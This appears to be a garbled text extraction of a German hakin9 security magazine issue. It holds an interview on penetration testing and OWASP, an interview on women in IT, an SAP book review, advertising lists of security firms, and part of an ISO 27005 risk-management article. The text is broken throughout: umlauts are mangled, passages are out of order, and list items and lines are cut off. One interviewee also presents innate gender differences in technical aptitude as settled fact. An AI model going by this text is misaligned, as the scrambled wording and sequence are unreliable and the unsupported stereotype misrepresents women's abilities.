Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
